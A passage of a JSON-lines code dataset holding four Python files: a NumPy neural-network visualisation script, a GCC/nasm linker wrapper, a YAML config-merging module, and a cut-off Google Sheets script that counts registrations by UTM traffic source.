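Note that, as in the original action class, splitting on commas means a remote group DN containing commas must be considered per-segment, which is why the SID suffix form is also colon-delimited.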
+{"seq_id":"466316595","text":"import model\nimport Visualization_data as vd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport os\nimport seaborn as sns\nsns.set_style(\"whitegrid\")\n\n#################################################################################\n# Further version of this file expected to be concise in plotting and monitoring#\n#################################################################################\n\n\n\n#Visualization learning process\n\n#Setup\n# boundary of the graph\nGRID_X_START = -1.5\nGRID_X_END = 2.5\nGRID_Y_START = -1.0\nGRID_Y_END = 2\n# output directory (the folder must be created on the drive)\nOUTPUT_DIR = \"./monitor_plots/\"\n\n#Grid boundary\ngrid = np.mgrid[GRID_X_START:GRID_X_END:100j,GRID_X_START:GRID_Y_END:100j]\ngrid_2d = grid.reshape(2, -1).T\nXX, YY = grid\n\n#Callback\ndef callback_numpy_plot(index, params):\n plot_title = \"NumPy Model - It: {:05}\".format(index)\n file_name = \"numpy_model_{:05}.png\".format(index//50)\n file_path = os.path.join(OUTPUT_DIR, file_name)\n prediction_probs, _ = model.full_forward_propagation(np.transpose(grid_2d), params, model.architecture)\n prediction_probs = prediction_probs.reshape(prediction_probs.shape[1], 1)\n vd.make_plot(vd.X_test, vd.y_test, plot_title, file_name=file_path, XX=XX, YY=YY, preds=prediction_probs, dark=True)\n \n#Traing callback\nparams_values, ini_params, cost_history, accuracy_history, grads_values, cashe = model.train(np.transpose(vd.X_train), np.transpose(vd.y_train.reshape((vd.y_train.shape[0], 1))), model.nn_architecture, init_strategy , 10000, 0.01, False, callback_numpy_plot)\n\n#Prediction and plotting\nprediction_probs_numpy, _ = model.full_forward_propagation(np.transpose(grid_2d), params_values, model.architecture)\nprediction_probs_numpy = prediction_probs_numpy.reshape(prediction_probs_numpy.shape[1], 1)\nvd.make_plot(vd.X_test, vd.y_test, \"NumPy Model\", file_name=None, XX=XX, YY=YY, preds=prediction_probs_numpy)\n\n# Accuracy achieved on the test set\n\nY_test_hat, _ = model.full_forward_propagation(np.transpose(vd.X_test), params_values, model.architecture)\nprint('Y test predicted shape', Y_test_hat.shape)\nprint('Y test shape before reshape',vd.y_test.shape)\nY_hat_converted, acc_test = model.get_accuracy_value(Y_test_hat, np.transpose(vd.y_test.reshape((vd.y_test.shape[0], 1))))\n\nprint('Y test predicted shape', Y_test_hat.shape)\nprint('Y test shape',vd.y_test.shape)\n\nprint('Y test predicted',Y_test_hat)\nprint('Y test predicted converted',Y_hat_converted)\nprint('Y test', vd.y_test)\nprint(\"Test set accuracy: {:.2f}\".format(acc_test))\n\n \n#plotting history\nprint('initial params as', ini_params)\nprint('last params as', params_values)\nprint('cost plot')\nplt.plot(cost_history)\nplt.show()\nprint ('accuracy over time', accuracy_history)\n\nprint ('Grads',grads_values)\n\nprint ('A and Z', cashe)","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"394965481","text":"\nimport os.path\nimport subprocess\nimport sys\n\nfrom .parse import *\nfrom .shared import eprintf\n\ndef cc_relink_objs(verbose, cc_bin, arch, inputs, output, cflags):\n archflag = '-m64' if arch == \"x86_64\" else '-m32'\n\n cctyp, ccver = get_cc_version(cc_bin)\n assert cctyp == \"gcc\", \"A GCC compiler is needed for relinking objects!\"\n relink_arg = \"-flinker-output=rel\" if ccver < (9,0) else \"-flinker-output=nolto-rel\"\n\n args = [cc_bin, archflag, '-nostartfiles', '-nostdlib', \\\n '-r', relink_arg, '-o', output] + cflags + inputs\n\n if verbose: eprintf(\"cc: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\ndef nasm_assemble_elfhdr(verbose, nasm_bin, arch, rtdir, intbl, output, asflags):\n if rtdir[-1] != '/': rtdir = rtdir + '/'\n archflag = 'elf64' if arch == \"x86_64\" else 'elf32'\n\n args = [nasm_bin, '-I', rtdir, '-f', archflag] + asflags + [intbl, '-o', output]\n\n if verbose: eprintf(\"nasm: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\ndef ld_link_final(verbose, cc_bin, arch, lddir, inobjs, output, ldflags, nx, sectorder, debug):\n linkscr = None\n if arch == 'x86_64':\n linkscr = ('x86_64_%s_nx' if nx else 'x86_64_%s_rwx') % sectorder\n else:\n linkscr = '%s_%s' % (arch, sectorder)\n\n archflag = '-m64' if arch == \"x86_64\" else '-m32'\n\n args = [cc_bin, archflag, '-L', lddir, '-T', '%s/link_%s.ld'%(lddir,linkscr), '-no-pie']\n if not debug:\n args.append('-Wl,--oformat=binary')\n #args = [*args, '-T', lddir+'/link.ld', '-Wl,--oformat=binary']\n args += ['-nostartfiles', '-nostdlib', '-o', output, *inobjs, *ldflags]\n\n if verbose: eprintf(\"ld: %s\" % repr(args))\n subprocess.check_call(args, stdout=subprocess.DEVNULL)\n\n","sub_path":"smol/cnl.py","file_name":"cnl.py","file_ext":"py","file_size_in_byte":1775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"566546938","text":"\"\"\"\nMerger module.\nContains the logic to merge loaded documents.\n\n- resolve_and_merge may be used to resolve and merge $ref entries in documents (as used by YamlConfigDocument).\n- load_subdocument may be used to load and merge sub-documents contained in YamlConfigDocuments.\n\n\"\"\"\nfrom typing import Union, Type, List, Optional\n\nfrom configcrunch import REF, REMOVE, REMOVE_FROM_LIST_PREFIX\n\nfrom typing import TYPE_CHECKING\n\nfrom configcrunch.interface import IYamlConfigDocument\nfrom configcrunch.loader import load_referenced_document\nfrom configcrunch.errors import ReferencedDocumentNotFound, InvalidRemoveError\n\nif TYPE_CHECKING:\n from configcrunch.abstract import YamlConfigDocument\n\n\ndef _merge_documents__recursion(target_node: any, source_node: any) -> any:\n \"\"\"\n Recursive merging step of merge_documents\n\n :param target_node: Node to MERGE INTO\n :param source_node: Node to MERGE FROM\n :return: Merge result\n \"\"\"\n # IS DICT IN SOURCE AND TARGET\n if isinstance(source_node, dict) and isinstance(target_node, dict):\n new_node = target_node.copy()\n for key, value in source_node.items():\n # Edge case: Normally we will remove all $remove markers after iterating over everything\n # to make sure everything is removed correctly. But if the key is $ref, we must remove\n # now, to make sure that the referenced document is not even loaded.\n if key == REF and value == REMOVE:\n if key in new_node:\n del new_node[key]\n else:\n if key in target_node:\n new_node[key] = _merge_documents__recursion(target_node[key], source_node[key])\n else:\n new_node[key] = source_node[key]\n return new_node\n\n # IS LIST IN SOURCE AND TARGET\n elif isinstance(source_node, list) and isinstance(target_node, list):\n result = list(target_node)\n result.extend(source_node)\n # Collect all $remove::\n removes = [\n x.split(REMOVE_FROM_LIST_PREFIX, 1)[-1]\n for x\n in result\n if isinstance(x, str) and x.startswith(REMOVE_FROM_LIST_PREFIX)\n ]\n # Remove all entries to remove\n result = list(filter(lambda x:\n not isinstance(x, str)\n or x not in removes,\n result))\n return result\n\n # IS YCD IN SOURCE AND TARGET\n elif isinstance(source_node, IYamlConfigDocument) and isinstance(target_node, IYamlConfigDocument):\n merge_documents(source_node, target_node)\n return source_node\n\n # IS SCALAR IN BOTH (or just in SOURCE)\n else:\n return source_node\n\n\ndef _delete_remove_markers__recursion(doc: any) -> any:\n \"\"\"\n Removes the $remove:: marker from all lists in doc.\n \"\"\"\n # IS DICT\n if isinstance(doc, dict):\n return {k: _delete_remove_markers__recursion(v) for k, v in doc.items() if v != REMOVE}\n\n # IS LIST\n elif isinstance(doc, list):\n # Remove all $remove:: entries\n return list(filter(lambda x:\n not isinstance(x, str)\n or not x.startswith(REMOVE_FROM_LIST_PREFIX),\n doc))\n\n # IS YCD\n elif isinstance(doc, IYamlConfigDocument):\n doc.doc = _delete_remove_markers__recursion(doc.doc)\n return doc\n\n # IS $remove\n if doc == REMOVE:\n raise InvalidRemoveError(\"Tried to remove a node at an unexpected position\")\n\n # IS SCALAR\n else:\n return doc\n\n\ndef delete_remove_markers(doc: 'YamlConfigDocument') -> None:\n \"\"\"\n Remove the $remove and $remove:: markers from the document\n :param doc:\n :return:\n \"\"\"\n _delete_remove_markers__recursion(doc)\n\n\ndef merge_documents(target: 'YamlConfigDocument', source: 'YamlConfigDocument') -> None:\n \"\"\"\n Merges two YamlConfigDocuments.\n\n :param target: Target document - this 
document will be changed, it will contain the result of merging target into source.\n :param source: Source document to base merge on\n \"\"\"\n newdoc = _merge_documents__recursion(source.doc, target.doc)\n target.doc = newdoc\n target.already_loaded_docs += source.already_loaded_docs\n\n new_entries = []\n for entry in source.absolute_paths:\n if entry not in target.absolute_paths:\n new_entries.append(entry)\n target.absolute_paths += new_entries\n\n\ndef resolve_and_merge(doc: 'YamlConfigDocument', lookup_paths: List[str]) -> None:\n \"\"\"\n Resolve the $ref entry at the beginning of the document body and merge with referenced documents\n (changes this document in place).\n May also be extended by subclasses to include sub-document resolving.\n\n :param doc: Document to work on\n :param lookup_paths: Paths to the repositories, where referenced should be looked up.\n :return:\n \"\"\"\n if REF in doc:\n # Resolve references\n prev_referenced_doc = None\n for referenced_doc in load_referenced_document(doc, lookup_paths):\n if prev_referenced_doc:\n # Merge referenced docs\n merge_documents(referenced_doc, prev_referenced_doc)\n prev_referenced_doc = referenced_doc\n if prev_referenced_doc is None:\n if doc.absolute_paths:\n raise ReferencedDocumentNotFound(\n f\"Referenced document {doc[REF]} not found. Requested by a document at {doc.absolute_paths[0]}\"\n )\n else:\n raise ReferencedDocumentNotFound(f\"Referenced document {doc[REF]} not found.\")\n # Resolve entire referenced docs\n resolve_and_merge(prev_referenced_doc, lookup_paths)\n # Merge content of current doc into referenced doc (and execute $remove's on the way)\n merge_documents(doc, prev_referenced_doc)\n # Remove $ref entry\n del doc[REF]\n\n\ndef load_subdocument(\n doc: 'Union[dict, YamlConfigDocument]',\n source_doc: 'YamlConfigDocument',\n doc_clss: 'Type[YamlConfigDocument]',\n lookup_paths: List[str],\n) -> Optional['YamlConfigDocument']:\n \"\"\"\n Load a subdocument of a specific type. This will convert the dict at this position\n into a YamlConfigDocument with the matching type and perform resolve_and_merge_references\n on it.\n\n :param doc: Dictionary with data to convert. Can also already be a document of the target type.\n :param source_doc: Parent document\n :param doc_clss: Class that is expected from the subdocument (target class)\n :param lookup_paths: Paths to the repositories, where referenced should be looked up.\n :return:\n \"\"\"\n doc_obj = doc\n if not isinstance(doc, doc_clss):\n doc_obj = doc_clss(doc, source_doc.path, source_doc,\n source_doc.already_loaded_docs, absolute_paths=source_doc.absolute_paths)\n\n return doc_obj.resolve_and_merge_references(lookup_paths)\n\n\ndef recursive_docs_to_dicts(input):\n \"\"\" Recursively removes all YamlConfigDocuments and replaces them by their doc dictionary.\"\"\"\n if isinstance(input, IYamlConfigDocument):\n return recursive_docs_to_dicts(input.doc.copy())\n elif isinstance(input, dict):\n new_dict = input.copy()\n for key, val in new_dict.items():\n new_dict[key] = recursive_docs_to_dicts(val)\n return new_dict\n elif isinstance(input, list):\n new_list = []\n for item in input.copy():\n new_list.append(recursive_docs_to_dicts(item))\n return new_list\n return input\n","sub_path":"configcrunch/merger.py","file_name":"merger.py","file_ext":"py","file_size_in_byte":7635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
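The list-merge semantics implemented in `_merge_documents__recursion` above can be demonstrated in isolation; a standalone sketch (`merge_lists` and `PREFIX` are illustrative names mirroring `REMOVE_FROM_LIST_PREFIX`):

```python
# Entries from both lists are concatenated, then every "$remove::x" marker
# deletes matching plain entries; the markers themselves are only stripped
# later by delete_remove_markers.
PREFIX = "$remove::"

def merge_lists(target, source):
    result = list(target) + list(source)
    removes = [x[len(PREFIX):] for x in result
               if isinstance(x, str) and x.startswith(PREFIX)]
    return [x for x in result if not isinstance(x, str) or x not in removes]

merged = merge_lists(["a", "b"], ["c", "$remove::a"])
assert merged == ["b", "c", "$remove::a"]
```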
+{"seq_id":"288869762","text":"from .models import Langing\n\nimport pandas as pd\n\nimport gspread\nfrom oauth2client.service_account import ServiceAccountCredentials\nfrom gspread_dataframe import get_as_dataframe\nimport vk_api\nimport time\nimport datetime\nimport re\n\nfrom rq import Queue\nfrom worker import conn\nfrom Startpage.utils import analitica,colvodneyforday\nfrom Startpage.utils_new_funnel import analitica_new_funnel,colvodneyforday_new_funnel\n\n\nfrom conecttosheets import connectsheet,connectIP,connect,connect_new_funnel\n\n\ndef googlesheets_new_funnel(completeurl,start,stop):\n df=connect_new_funnel(completeurl)\n df['new_col'] = df['utm_source'] + ' / ' + df['utm_medium']+ ' / ' + df['utm_campaign']+ ' / ' + df['utm_term']+ ' / ' + df['utm_content']\n a = df.dropna(subset=[list(df)[0]])\n newdf = a[['sended','utm_source', 'utm_medium', 'utm_campaign', 'new_col']]\n\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), int(stop[8:10]))\n\n\n dd = [d1 + datetime.timedelta(days=x) for x in range((d2 - d1).days + 1)]\n for x in dd:\n datedelta.append(str(x))\n\n\n\n #DELETE DATES\n for i in newdf['sended']:\n if i[:10] in datedelta or i==' ':\n pass\n else:\n newdf=newdf.drop(newdf.index[newdf['sended']==i])\n\n slovaritog = {'Уникальный пакет промо': 0,\n 'Уникальная рассылка': 0,\n 'Digest рассылка по всей базе': 0,\n 'Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)': 0,\n 'Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата ': 0,\n 'рассылка по базе кейсеров': 0,\n 'рассылка по IT базе': 0,\n 'рассылка по базе инженеров': 0,\n 'рассылка по базе нефтяников': 0,\n 'рассылка по базе бизнес': 0,\n 'рассылка по базе partials': 0,\n 'Рассылка по новой базе hh': 0,\n 'Рассылка по базе курса первокурсника': 0,\n 'Рассылка по старой базе hh': 0,\n 'Рассылка по базе финансистов и экономистов': 0,\n 'Рассылка по базе менеджмента': 0,\n 'Рассылка по базе аналитиков': 0,\n 'рассылка по базе региона Спб': 0,\n 'рассылка по базе региона Сибирь': 0,\n 'рассылка по базе региона Урал': 0,\n 'рассылка по базе региона Волга': 0,\n 'рассылка по базе региона Дальний Восток': 0,\n 'рассылка по базе Казахстана': 0,\n 'рассылка по прошлогодней базе проекта': 0,\n 'рассылка по прошлогодней базе Аламни': 0,\n 'рассылка по прошлогодней базе Школы': 0,\n 'рассылка по прошлогодней базе Тулкита': 0,\n 'рассылка по прошлогодней базе стажировок': 0,\n 'рассылка по базе б2б партнеров (холодные)': 0,\n 'рассылка по базе б2б партнеров (теплые)': 0,\n 'таргетинг тизеры vk': 0,\n 'таргетинг в новостой ленте vk': 0,\n 'таргетинг в VK Stories': 0,\n 'таргетинг в новостой ленте instagram': 0,\n 'таргетинг в Instagram Stories': 0,\n 'таргетинг stories fb': 0,\n 'таргетинг в новостой ленте fb': 0,\n 'таргетинг на лидформу fb': 0,\n 'таргетинг на лидформу вк': 0,\n 'SMM:стена вк основная группа': 0,\n 'SMM:стена вк группа Спб': 0,\n 'SMM:стена вк группа Сибири': 0,\n 'SMM:стена вк группа Урала': 0,\n 'SMM:стена вк группа Волги': 0,\n 'SMM:стена вк группа Казахстана': 0,\n 'SMM:рассылка-дайжест ВК в ЛС': 0,\n 'SMM:рассылка о кейс-чемприонатах ВК в ЛС': 0,\n 'SMM:рассылка с вакансиями ВК в ЛС': 0,\n 'SMM:рассылка о мероприятиях ВК в ЛС': 0,\n 'SMM:рассылка со статьями/полезными материалами ВК в ЛС': 0,\n 'SMM:стена клиентской группы ВК': 0,\n 'пост в телеграм-канале': 0,\n 'дайджест в телеграм-канале': 0,\n 'ссылка на 
главном слайдере': 0,\n 'ссылка на главной в разделе мероприятий': 0,\n 'ссылка на главной в разделе обучения/курсов': 0,\n 'ссылка на главной в разделе чемпионатов': 0,\n 'пуш-уведомление на сайте': 0,\n 'ссылка на странице мероприятий': 0,\n 'ссылка на странице обучение': 0,\n 'ссылка на странице чемпионатов': 0,\n 'ссылка на странице вакансии': 0,\n 'поп-ап на сайте веб-версия': 0,\n 'поп-ап на сайте мобильная версия': 0,\n 'ссылка с личного кабинета': 0,\n 'Ссылка по роликом на Yotube-канал': 0,\n 'группа ФБ': 0,\n 'Страница АА в ФБ': 0,\n 'Страница в Твиттере': 0,\n 'ссылка в БИО': 0,\n 'ссылка в сториз': 0,\n 'инфопартнеры:баннер на сайте': 0,\n 'инфопартнеры:пост вконтакте': 0,\n 'инфопартнеры:пост в Telegram': 0,\n 'инфопартнеры:имейл рассылка': 0,\n 'инфопартнеры:статья или анонс на сайте': 0,\n 'инфопартнеры:пост в Twitter': 0,\n 'инфопартнеры:пост в Instagram': 0,\n 'инфопартнеры:пост в Facebook': 0,\n 'Амбассадор договаривается о размещении на онлайн-ресурсах': 0,\n 'Амбассадор собирает офлайн-регистрации': 0,\n 'Размещение в ЦРК': 0,\n 'Размещение в студсовете': 0,\n 'Размещение в профкоме': 0,\n 'Размещение в кейс-клубе': 0,\n 'Размещение в медиа': 0,\n 'Размещение в главной группе вуза': 0,\n 'Размещение для выпускников': 0,\n 'Размещение в бизнес-клубе': 0,\n 'Размещение на кафедре': 0,\n 'Размещение через преподавателей': 0,\n 'Размещение в студенческом научном обществе': 0,\n 'Размещение через онлайн-аутсорс': 0,\n 'Размещение через офлайн-аутсорс': 0,\n 'Роадшоу с флаерами/плакатами (регистрации по QR-коду)': 0,\n 'Роадшоу с анкетами (с дальнейшей оцифровкой)': 0,\n 'Размещение в СМИ': 0,\n 'прозвон по базе hh с отправкой рассылки': 0,\n 'Прозвон по partials с отправкой рассылки': 0,\n 'Прозвон по базам прошлых лет с отправкой рассылки': 0,\n 'Прозвон по каким-либо базам с отправкой рассылки': 0,\n 'Прозвон с регистрацией на звонке': 0,\n 'Яндекс на поиске по брендовым запросам': 0,\n 'Яндекс РСЯ по брендовым запросам': 0,\n 'Яндекс на Поиске по запросам без упоминания бренда': 0,\n 'Яндекс РСЯ по запросам без упоминания бренда': 0,\n 'Google на поиске по брендовым запросам': 0,\n 'Google КМС по брендовым запросам': 0,\n 'Google на Поиске по запросам без упоминания бренда': 0,\n 'Google КМС по запросам без упоминания бренда': 0,\n 'Youtube контекст': 0,\n 'Виртуальный рекрутер': 0,\n 'Органика': 0,\n 'Неопознанный трафик': 0}\n for k in list(newdf['new_col']):\n i = str(k)\n if 'all / changellenge / unical-promo' in i:\n slovaritog['Уникальный пакет промо'] += 1\n elif 'email / generalbase' in i:\n slovaritog['Уникальная рассылка'] += 1\n elif 'email / digest' in i:\n slovaritog['Digest рассылка по всей базе'] += 1\n elif 'email / segment-mailchimp' in i:\n slovaritog['Рассылка по сборному сегементу через mailchimp (например, те кто кликал на стажировки)'] += 1\n elif 'email / segment / cup' in i:\n slovaritog['рассылка по базе кейсеров'] += 1\n elif 'email / segment / it' in i:\n slovaritog['рассылка по IT базе'] += 1\n elif 'email / segment / engineers' in i:\n slovaritog['рассылка по базе инженеров'] += 1\n elif 'email / segment / oil' in i:\n slovaritog['рассылка по базе нефтяников'] += 1\n elif 'email / segment / business' in i:\n slovaritog['рассылка по базе бизнес'] += 1\n elif 'email / segment / partials' in i:\n slovaritog['рассылка по базе partials'] += 1\n elif 'email / segment / 
external' in i:\n slovaritog['Рассылка по новой базе hh'] += 1\n\n\n\n\n elif 'email / segment / kp' in i:\n slovaritog['Рассылка по базе курса первокурсника'] += 1\n elif 'email / segment / old-external' in i:\n slovaritog['Рассылка по старой базе hh'] += 1\n elif 'email / segment / fin' in i:\n slovaritog['Рассылка по базе финансистов и экономистов'] += 1\n elif 'email / segment / manager' in i:\n slovaritog['Рассылка по базе менеджмента'] += 1\n elif 'email / segment / analytic' in i:\n slovaritog['Рассылка по базе аналитиков'] += 1\n elif 'email / segment / spb' in i:\n slovaritog['рассылка по базе региона Спб'] += 1\n elif 'email / segment / siberia' in i:\n slovaritog['рассылка по базе региона Сибирь'] += 1\n elif 'email / segment / ural' in i:\n slovaritog['рассылка по базе региона Урал'] += 1\n elif 'email / segment / volga' in i:\n slovaritog['рассылка по базе региона Волга'] += 1\n elif 'email / segment / dv' in i:\n slovaritog['рассылка по базе региона Дальний Восток'] += 1\n elif 'email / segment / kz' in i:\n slovaritog['рассылка по базе Казахстана'] += 1\n elif 'email / segment / last-year' in i:\n slovaritog['рассылка по прошлогодней базе проекта'] += 1\n elif 'email / segment / alumni' in i:\n slovaritog['рассылка по прошлогодней базе Аламни'] += 1\n elif 'email / segment / school' in i:\n slovaritog['рассылка по прошлогодней базе Школы'] += 1\n elif 'email / segment / toolkit' in i:\n slovaritog['рассылка по прошлогодней базе Тулкита'] += 1\n elif 'email / segment / internship' in i:\n slovaritog['рассылка по прошлогодней базе стажировок'] += 1\n elif 'email / segment' in i:\n # generic segment base, checked only after all specific 'email / segment / ...' bases\n slovaritog['Рассылка по сборной базе под конкретный проект (например, ИТшники из Уфы, 3-4 курс) или Рассылка по базе партнера чемпионата '] += 1\n elif 'email / hr-digest / cold' in i:\n slovaritog['рассылка по базе б2б партнеров (холодные)'] += 1\n elif 'email / hr-digest / warm' in i:\n slovaritog['рассылка по базе б2б партнеров (теплые)'] += 1\n elif 'target / vk / tizer' in i:\n slovaritog['таргетинг тизеры vk'] += 1\n elif 'target / vk / post' in i:\n slovaritog['таргетинг в новостой ленте vk'] += 1\n elif 'target / vk / story' in i:\n slovaritog['таргетинг в VK Stories'] += 1\n elif 'target / insta / post' in i:\n slovaritog['таргетинг в новостой ленте instagram'] += 1\n elif 'target / insta / story' in i:\n slovaritog['таргетинг в Instagram Stories'] += 1\n elif 'target / fb / story' in i:\n slovaritog['таргетинг stories fb'] += 1\n elif 'target / fb / post' in i:\n slovaritog['таргетинг в новостой ленте fb'] += 1\n elif 'target / fb / leadform' in i:\n slovaritog['таргетинг на лидформу fb'] += 1\n elif 'target / vk / leadform' in i:\n slovaritog['таргетинг на лидформу вк'] += 1\n elif 'vk / global / post' in i:\n slovaritog['SMM:стена вк основная группа'] += 1\n elif 'vk / spb / post' in i:\n slovaritog['SMM:стена вк группа Спб'] += 1\n elif 'vk / siberia / post' in i:\n slovaritog['SMM:стена вк группа Сибири'] += 1\n elif 'vk / ural / post' in i:\n slovaritog['SMM:стена вк группа Урала'] += 1\n elif 'vk / volga / post' in i:\n slovaritog['SMM:стена вк группа Волги'] += 1\n elif 'vk / kz / post' in i:\n slovaritog['SMM:стена вк группа Казахстана'] += 1\n elif 'vk / global / digest' in i:\n slovaritog['SMM:рассылка-дайжест ВК в ЛС'] += 1\n elif 'vk / global / cups' in i:\n slovaritog['SMM:рассылка о кейс-чемприонатах ВК в ЛС'] += 1\n elif 'vk / global / vacancy' in i:\n slovaritog['SMM:рассылка с вакансиями ВК в ЛС'] += 1\n elif 'vk / global / events' in i:\n slovaritog['SMM:рассылка о мероприятиях ВК в ЛС'] += 1\n elif 'vk / global / article' in i:\n slovaritog['SMM:рассылка со статьями/полезными материалами ВК в ЛС'] += 1\n elif 'vk / ' in i and 'post / (not set)' in 
i:\n slovaritog['SMM:стена клиентской группы ВК'] += 1\n elif 'tg / post' in i:\n slovaritog['пост в телеграм-канале'] += 1\n elif 'tg / digest' in i:\n slovaritog['дайджест в телеграм-канале'] += 1\n elif 'cl-site / main / slider' in i:\n slovaritog['ссылка на главном слайдере'] += 1\n elif 'cl-site / main / events' in i:\n slovaritog['ссылка на главной в разделе мероприятий'] += 1\n elif 'cl-site / main / education' in i:\n slovaritog['ссылка на главной в разделе обучения/курсов'] += 1\n elif 'cl-site / main / champs' in i:\n slovaritog['ссылка на главной в разделе чемпионатов'] += 1\n elif 'cl-site / push' in i:\n slovaritog['пуш-уведомление на сайте'] += 1\n elif 'cl-site / page / event' in i:\n slovaritog['ссылка на странице мероприятий'] += 1\n elif 'cl-site / page / education' in i:\n slovaritog['ссылка на странице обучение'] += 1\n elif 'cl-site / page / champs' in i:\n slovaritog['ссылка на странице чемпионатов'] += 1\n elif 'cl-site / page / vacancy' in i:\n slovaritog['ссылка на странице вакансии'] += 1\n elif 'cl-site / popup / desktop' in i:\n slovaritog['поп-ап на сайте веб-версия'] += 1\n elif 'cl-site / popup / mobile' in i:\n slovaritog['поп-ап на сайте мобильная версия'] += 1\n elif 'cl-site / main / personal' in i:\n slovaritog['ссылка с личного кабинета'] += 1\n elif 'youtube / video' in i:\n slovaritog['Ссылка по роликом на Yotube-канал'] += 1\n # the more specific AA-page pattern must be checked before the generic 'fb / post'\n elif 'fb / post / aa' in i:\n slovaritog['Страница АА в ФБ'] += 1\n elif 'fb / post' in i:\n slovaritog['группа ФБ'] += 1\n elif 'twitter / post / aa' in i:\n slovaritog['Страница в Твиттере'] += 1\n elif 'inst / bio' in i:\n slovaritog['ссылка в БИО'] += 1\n elif 'inst / stories' in i:\n slovaritog['ссылка в сториз'] += 1\n elif 'ip /' in i and 'banner /' in i:\n slovaritog['инфопартнеры:баннер на сайте'] += 1\n elif 'ip /' in i and 'vk-post /' in i:\n slovaritog['инфопартнеры:пост вконтакте'] += 1\n elif 'ip /' in i and 'tg-post /' in i:\n slovaritog['инфопартнеры:пост в Telegram'] += 1\n elif 'ip /' in i and 'email /' in i:\n slovaritog['инфопартнеры:имейл рассылка'] += 1\n elif 'ip /' in i and 'article /' in i:\n slovaritog['инфопартнеры:статья или анонс на сайте'] += 1\n elif 'ip /' in i and 'tw-post /' in i:\n slovaritog['инфопартнеры:пост в Twitter'] += 1\n elif 'ip /' in i and 'inst-post /' in i:\n slovaritog['инфопартнеры:пост в Instagram'] += 1\n elif 'ip /' in i and 'fb-post /' in i:\n slovaritog['инфопартнеры:пост в Facebook'] += 1\n elif 'amb /' in i and 'online /' in i:\n slovaritog['Амбассадор договаривается о размещении на онлайн-ресурсах'] += 1\n elif 'amb /' in i and 'offline /' in i:\n slovaritog['Амбассадор собирает офлайн-регистрации'] += 1\n elif 'vuz /' in i and 'crk / chat /' in i:\n slovaritog['Размещение в ЦРК'] += 1\n elif 'vuz /' in i and 'studsovet / vk-post /' in i:\n slovaritog['Размещение в студсовете'] += 1\n elif 'vuz /' in i and 'profkom / fb-post /' in i:\n slovaritog['Размещение в профкоме'] += 1\n elif 'vuz /' in i and 'kk / website /' in i:\n slovaritog['Размещение в кейс-клубе'] += 1\n elif 'vuz /' in i and 'media / email /' in i:\n slovaritog['Размещение в медиа'] += 1\n elif 'vuz /' in i and 'maingroup / article /' in i:\n slovaritog['Размещение в главной группе вуза'] += 1\n elif 'vuz /' in i and 'alumni / webinar /' in i:\n slovaritog['Размещение для выпускников'] += 1\n elif 'vuz /' in i and 'bk /' in i:\n slovaritog['Размещение в бизнес-клубе'] += 1\n elif 'vuz /' in i and 'kafedra /' in i:\n slovaritog['Размещение на кафедре'] += 1\n elif 'vuz /' in i and 'teacher /' in i:\n 
slovaritog['Размещение через преподавателей'] += 1\n elif 'vuz /' in i and 'sno /' in i:\n slovaritog['Размещение в студенческом научном обществе'] += 1\n elif 'vuz /' in i and 'online-outsors /' in i:\n slovaritog['Размещение через онлайн-аутсорс'] += 1\n elif 'vuz /' in i and 'offline-outsors /' in i:\n slovaritog['Размещение через офлайн-аутсорс'] += 1\n elif 'vuz /' in i and 'flyer /' in i:\n slovaritog['Роадшоу с флаерами/плакатами (регистрации по QR-коду)'] += 1\n elif 'vuz /' in i and 'roadshow /' in i:\n slovaritog['Роадшоу с анкетами (с дальнейшей оцифровкой)'] += 1\n elif 'smi /' in i and '(not set) / (not set)' in i:\n slovaritog['Размещение в СМИ '] += 1\n elif 'tlm / email / external' in i:\n slovaritog['прозвон по базе hh с отправкой рассылки'] += 1\n elif 'tlm / email / partials' in i:\n slovaritog['Прозвон по partials с отправкой рассылки'] += 1\n elif 'tlm / email / last-year' in i:\n slovaritog['Прозвон по базам прошлых лет с отправкой рассылки'] += 1\n elif 'tlm / email' in i:\n slovaritog['Прозвон по каким-либо базам с отправкой рассылки'] += 1\n elif 'tlm / reg' in i:\n slovaritog['Прозвон с регистрацией на звонке'] += 1\n elif 'yandex / cpc' in i and 'brand' in i:\n slovaritog['Яндекс на поиске по брендовым запросам'] += 1\n elif 'yandex / cpm' in i and 'brand' in i:\n slovaritog['Яндекс РСЯ по брендовым запросам'] += 1\n elif 'yandex / cpc' in i and 'general' in i:\n slovaritog['Яндекс на Поиске по запросам без упоминания бренда'] += 1\n elif 'yandex / cpm' in i and 'general' in i:\n slovaritog['Яндекс РСЯ по запросам без упоминания бренда'] += 1\n elif 'google / cpc' in i and 'brand' in i:\n slovaritog['Google на поиске по брендовым запросам'] += 1\n elif 'google / cpm' in i and 'brand' in i:\n slovaritog['Google КМС по брендовым запросам'] += 1\n elif 'google / cpc' in i and 'general' in i:\n slovaritog['Google на Поиске по запросам без упоминания бренда'] += 1\n elif 'google / cpm' in i and 'general' in i:\n slovaritog['Google КМС по запросам без упоминания бренда'] += 1\n elif 'youtube / cpm' in i and 'brand' in i:\n slovaritog['Youtube контекст'] += 1\n elif 'external-lidgen / cpc / premium' in i:\n slovaritog['Виртуальный рекрутер'] += 1\n elif '(direct) / (none)' in i or 'referral' in i or 'organic' in i:\n slovaritog['Органика'] += 1\n else:\n slovaritog['Неопознанный трафик'] += 1\n\n\n\n return dict((k, v) for k, v in slovaritog.items() if v!=0)\n\ndef googlesheets(completeurl,start,stop):\n df=connect(completeurl)\n df['new_col'] = df['utm_source'] + ' / ' + df['utm_medium']\n a = df.dropna(subset=[list(df)[0]])\n newdf = a[['sended','utm_source', 'utm_medium', 'utm_campaign', 'new_col']]\n\n\n datedelta = []\n d1 = datetime.date(int(start[:4]), int(start[5:7]), int(start[8:10]))\n d2 = datetime.date(int(stop[:4]), int(stop[5:7]), 